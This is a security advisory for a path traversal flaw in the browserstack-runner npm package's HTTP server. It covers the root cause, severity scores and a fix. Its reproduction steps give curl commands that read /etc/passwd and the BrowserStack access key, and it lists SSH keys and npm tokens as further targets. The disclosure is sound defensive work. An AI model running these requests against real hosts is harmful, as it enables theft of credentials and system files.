GHSA-8rpw-6cqh-2v9h
Suggest an improvement- Source
- https://github.com/advisories/GHSA-8rpw-6cqh-2v9h
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-8rpw-6cqh-2v9h/GHSA-8rpw-6cqh-2v9h.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-8rpw-6cqh-2v9h
- Aliases
-
- CVE-2026-49144
- Published
- 2026-06-03T21:38:40Z
- Modified
- 2026-06-03T21:45:15.539729589Z
- Severity
-
- 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVSS Calculator
- 7.1 (High) CVSS_V4 - CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- browserstack-runner has an unauthenticated arbitrary file read via path traversal in HTTP server
- Details
-
Summary
The HTTP server in browserstack-runner serves files from the project directory via the
_defaulthandler. This handler usespath.join(process.cwd(), uri)to resolve file paths but does not validate that the resulting path stays within the project root. Combined with the server binding on0.0.0.0(all interfaces) and the absence of any authentication, this allows an unauthenticated network-adjacent attacker to read arbitrary files from the host filesystem.Root Cause
lib/server.js, lines 530–534 :
_defaulthandler:'_default': function defaultHandler(uri, body, request, response) { var filePath = path.join(process.cwd(), uri); handleFile(filePath, request, response); }uricomes fromurl.parse(request.url).pathname(line 540), which preserves../sequences.path.joinresolves them, producing absolute paths outside the project directory. No boundary check is performed before serving the file.bin/cli.js, line 131 : server binding:
server.listen(parseInt(config.test_server_port, 10));No hostname is specified, so Node.js binds on
0.0.0.0(all interfaces).No authentication: The
_defaulthandler does not callgetWorkerUuid()or perform any authentication check.Steps to Reproduce
Step 1 : Start the server (Terminal 1)
cd browserstack-runner echo '<html><body>test</body></html>' > _poc_test.html echo '{"username":"X","key":"X","test_path":"_poc_test.html","test_framework":"qunit","browsers":[]}' > browserstack.json node bin/runner.jsStep 2 : Read arbitrary files (Terminal 2)
Read /etc/hostname:
curl -s --path-as-is "http://127.0.0.1:8888/../../../etc/hostname"Read /etc/passwd:
curl -s --path-as-is "http://127.0.0.1:8888/../../../etc/passwd"Read the BrowserStack access key from config:
curl -s "http://127.0.0.1:8888/browserstack.json"Note:
--path-as-isis required because curl normalizes../sequences by default. Browsers and HTTP libraries that do not normalize URL paths (or that allow raw path construction) can exploit this without special flags.Expected Result
/etc/hostname→ server returns the machine hostname/etc/passwd→ server returns the full passwd filebrowserstack.json→ server returns the config including the BrowserStack access key
Impact
- BrowserStack access key theft :
browserstack.jsonis always in the project root (same directory the server serves from), and containsusernameandkeyin cleartext - Source code theft : all project files are readable
- System file disclosure :
/etc/passwd,/etc/shadow(if readable), SSH keys,.envfiles,.npmrc(npm tokens), etc. - Chainable with Finding #1 : same server, same exposure window, same network-adjacent attacker
Suggested Fix
- Validate the resolved path stays within the project root:
var filePath = path.resolve(process.cwd(), '.' + uri); if (!filePath.startsWith(process.cwd() + path.sep)) { sendError(response, 'Forbidden', 403); return; } - Bind on
127.0.0.1 - Add authentication to the
_defaulthandler
- Database specific
{ "cwe_ids": [ "CWE-22" ], "severity": "HIGH", "github_reviewed_at": "2026-06-03T21:38:40Z", "github_reviewed": true, "nvd_published_at": "2026-06-02T21:16:28Z" }- References
Affected packages
npm / browserstack-runner
Package
- Name
- browserstack-runner
- View open source insights on deps.dev
- Purl
- pkg:npm/browserstack-runner